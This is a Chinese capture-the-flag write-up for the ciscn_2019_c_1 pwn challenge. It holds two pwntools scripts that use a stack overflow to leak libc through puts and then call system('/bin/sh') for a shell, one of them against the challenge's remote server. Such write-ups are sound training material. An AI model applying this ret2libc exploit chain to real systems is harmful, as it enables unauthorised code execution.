查看保护状态

打开IDA查看，发现不存在后门函数，这道题目也没有给libc，那么这里借助ret2libc来实现getshell。
题目给出的环境是Ubuntu 18版本。

IDA中发现存在一个栈溢出，并且看到了一个strlen，只需要放一个\0截断即可，这样我们输入的数据就不会被加密处理（这里的加密方式只是简单的异或，异或两次也能恢复原来的值）。

在leak出来的数据前面有一些无效的字符,所以在接收puts地址的时候需要先recvline两次
EXP
(如果需要打远程,请使用LibcSearcher,否则请使用正确的libc版本)
# Python 2 / pwntools script (print statements, str payloads); the gadget and
# offset values are hard-coded for this specific challenge binary.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
p = process("./ciscn_2019_c_1")
#p = remote("node4.buuoj.cn","28569")
elf = ELF("./ciscn_2019_c_1")
ret=0x4006b9
rdi=0x400c83
main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
p.recvuntil('choice!\n')
p.sendline('1')
# Leading NUL ends the strlen-bounded XOR pass, so the rest of the buffer is
# passed through unchanged (see the write-up text above).
payload='\0'+'a'*(0x50-1+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.recvuntil("encrypted\n")
p.sendline(payload)
#gdb.attach(p)
# Two recvline() calls skip the junk printed before the leaked address (see write-up).
p.recvline()
p.recvline()
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print "puts is:"+hex(puts_addr)
#gdb.attach(p)
# Local libc file; the write-up notes LibcSearcher is used instead for a remote target.
libc = ELF("./libc-2.27.so")
libc_base=puts_addr-libc.sym['puts']
system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search("/bin/sh"))
print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(bin_sh)
payload1='\0'+'a'*(0x50-1+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system_addr)
p.sendlineafter("Input your choice!\n","1")
p.sendlineafter("Input your Plaintext to be encrypted\n",payload1)
p.interactive()
EXP2
另一种写法
# Python 2 / pwntools script (print statements, str payloads). Same chain as EXP,
# resolving libc symbols through LibcSearcher instead of a local libc file.
from pwn import *
from LibcSearcher import *
# io = process('./ciscn_2019_c_1')
io = remote("node4.buuoj.cn","28569")
elf = ELF('./ciscn_2019_c_1')
# libc=ELF('./libc-2.27.so')
context.log_level='debug'
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000400c83
main_addr = 0x400B28
ret = 0x00000000004006b9
io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')
payload='a'*(0x50+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
payload2=[]
# NOTE(review): the indentation of this helper was lost in the paste; the nesting
# below is reconstructed -- confirm against the original. Its result (payload2)
# is only printed further down and is never sent, so it does not affect the run.
# The innermost test `>47 or <=57` is true for every byte value.
def decrypt(content):
    for i in range(0,len(content)):
        if(ord(content[i])<=96 or ord(content[i])>122):
            if(ord(content[i])<=64 or ord(content[i])>90):
                if(ord(content[i])>47 or ord(content[i])<=57):
                    payload2.append(ord(content[i])^0xf)
                    continue
                else:
                    payload2.append(ord(content[i])^0xe)
                    continue
            else:
                payload2.append(ord(content[i])^0xd)
                continue
decrypt(payload)
payload2 = bytearray(payload2)
print "payload2----->" + payload2
# pause()
io.sendline(payload)
io.recvuntil('\x40\x0a')#@C
puts_addr = u64(io.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
# libc_base = puts_addr - libc.sym['puts']
libc_base = puts_addr - libc.dump('puts')
print "libc_base----->" + hex(libc_base)
# system=libc.sym['system']
system=libc.dump('system')
binsh = libc  # unused; binsh_addr below is computed independently
system_addr = libc_base+system
binsh_addr = libc_base+libc.dump('str_bin_sh')
# binsh_addr=next(libc.search("/bin/sh"))+libc_base
payload = 'a'*(0x50+8)+p64(ret)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')
# gdb.attach(io,'b *0x400AE8')
io.sendline(payload)
io.interactive()